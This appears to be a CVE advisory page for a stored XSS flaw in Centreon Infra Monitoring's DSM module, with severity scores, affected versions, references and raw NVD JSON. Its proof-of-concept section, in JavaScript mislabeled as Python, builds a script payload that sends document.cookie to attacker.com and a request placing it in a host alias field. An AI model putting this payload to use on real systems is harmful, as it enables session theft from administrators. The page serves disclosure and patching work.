CVE-2025-12511

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (DSM extenstio configuration modules) allows Stored XSS to user with elevated privileges. This issue affects Infra Monitoring: from 25.10.0 before 25.10.1, from 24.10.0 before 24.10.4, from 24.04.0 before 24.04.8.

CVSS Details

CVSS Score

6.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:centreon:dynamic_service_management:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:centreon:dynamic_service_management:25.10.0:*:*:*:*:*:*:* - VULNERABLE

Centreon Infra Monitoring 25.10.0 < 25.10.1

Centreon Infra Monitoring 24.10.0 < 24.10.4

Centreon Infra Monitoring 24.04.0 < 24.04.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-12511 PoC - Centreon DSM Extension Stored XSS
// This PoC demonstrates the stored XSS vulnerability in Centreon Infra Monitoring
// Requires high privilege account (e.g., admin)

// Malicious payload to be injected in DSM configuration module
const maliciousPayload = '<script>\n'
    + 'fetch("https://attacker.com/steal?cookie=" + document.cookie)\n'
    + '.then(response => response.text())\n'
    + '.then(data => console.log("Data stolen:", data));\n'
    + '</script>';

// Example: Inject via API or Web Interface
// POST /centreon/api/latest/dsm/config/hosts
const exploitRequest = {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json',
        'Cookie': 'PHPSESSID=admin_session_cookie'
    },
    body: JSON.stringify({
        host_name: 'DSM Service Monitor',
        host_alias: maliciousPayload,  // XSS payload injected here
        host_address: '127.0.0.1',
        host_template: 'generic-host',
        host_active_checks_enabled: '0',
        host_passive_checks_enabled: '1'
    })
};

// When other users visit the affected page, the script executes
// Example victim request:
// GET /centreon/api/latest/dsm/config/hosts
// Response will include the malicious script in HTML context

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12511
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12511
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12511/
[4] VulDB https://vuldb.com/cve/CVE-2025-12511
[5] https://github.com/centreon/centreon/releases
[6] https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12511-centreon-dsm-medium-severity-5361

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12511", "sourceIdentifier": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "published": "2026-01-05T14:15:53.133", "lastModified": "2026-01-26T15:33:51.160", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (DSM extenstio configuration modules) allows Stored XSS \n\nto user with elevated privileges.\n\nThis issue affects Infra Monitoring: from 25.10.0 before 25.10.1, from 24.10.0 before 24.10.4, from 24.04.0 before 24.04.8."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web (XSS o 'cross-site scripting') vulnerabilidad en Centreon Infra Monitoring (módulos de configuración de la extensión DSM) permite XSS Almacenado a usuario con privilegios elevados.\n\nEste problema afecta a Infra Monitoring: desde 25.10.0 antes de 25.10.1, desde 24.10.0 antes de 24.10.4, desde 24.04.0 antes de 24.04.8."}], "metrics": {"cvssMetricV31": [{"source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:centreon:dynamic_service_management:*:*:*:*:*:*:*:*", "versionStartIncluding": "24.04.0", "versionEndExcluding": "24.04.8", "matchCriteriaId": "AA025E77-1B5C-4E14-811D-F792671B4373"}, {"vulnerable": true, "criteria": "cpe:2.3:a:centreon:dynamic_service_management:*:*:*:*:*:*:*:*", "versionStartIncluding": "24.10.0", "versionEndExcluding": "24.10.4", "matchCriteriaId": "00C3C1F1-7FE8-4B51-B361-70BFD3A4952A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:centreon:dynamic_service_management:25.10.0:*:*:*:*:*:*:*", "matchCriteriaId": "FDC770A2-4AA6-4C27-94FB-5F432154340C"}]}]}], "references": [{"url": "https://github.com/centreon/centreon/releases", "source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "tags": ["Release Notes"]}, {"url": "https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12511-centreon-dsm-medium-severity-5361", "source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "tags": ["Patch", "Vendor Advisory"]}]}}